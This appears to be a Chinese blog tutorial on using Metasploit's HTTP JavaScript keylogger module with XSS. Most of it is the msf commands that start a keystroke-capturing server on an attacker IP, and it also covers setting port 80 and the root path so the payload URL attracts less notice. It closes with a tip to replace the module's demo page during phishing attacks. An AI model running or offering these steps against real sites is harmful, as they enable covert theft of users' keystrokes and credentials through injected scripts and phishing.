Metasploit之玩转不一样的XSS
参考文献:http://www.freebuf.com/articles/3549.html
这里主要是运用XSS攻击进行的键盘记录keylogger
首先我们打开metasploit,在msf中搜索下可用的keylogger模块
msf > search keylogger -->搜索keylogger模块
得到回显三个模块
auxiliary/server/capture/http_javascript_keylogger
normal Capture: HTTP JavaScript Keylogger//正常捕获:HTTP的JavaScript程序
post/osx/capture/keylog_recorder
normal OSX Capture Userspace Keylogger//正常的OSX捕捉用户的键盘记录程序
post/windows/capture/lockout_keylogger
normal Windows Capture Winlogon Lockout Credential Keylogger//正常的Windows凭据捕获winlogon锁定键盘记录
这里我们可以测试的是利用HTTP的JavaScript程序捕获键盘记录,XSS运用的
use auxiliary/server/capture/http_javascript_keylogger -->使用该模块
show options -->查看设置选项
set srvhost 192.168.2.146 -->设置我们的反弹回来的IP地址
run -->运行,得到XSS利用地址
运行后发现我们得到的地址是这样的:http://192.168.2.146:8080/qD5XRm?id=35632ed2
若为了方便隐藏,我们可以设置端口SRVPORT为80,路径URIPATH为根目录下“/”,命令如下
set srvport 80 -->设置访问端口80
set uripath / -->设置访问路径为根目录
run -->运行,得到地址,等待访问捕获键盘记录
得到回显地址:http://192.168.2.146:80/
PS:在设置选项中还有一个配置“demo”,就是msf本身自带的测试页面,我们在做钓鱼攻击的时候需要将这个页面替换掉就可以了
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论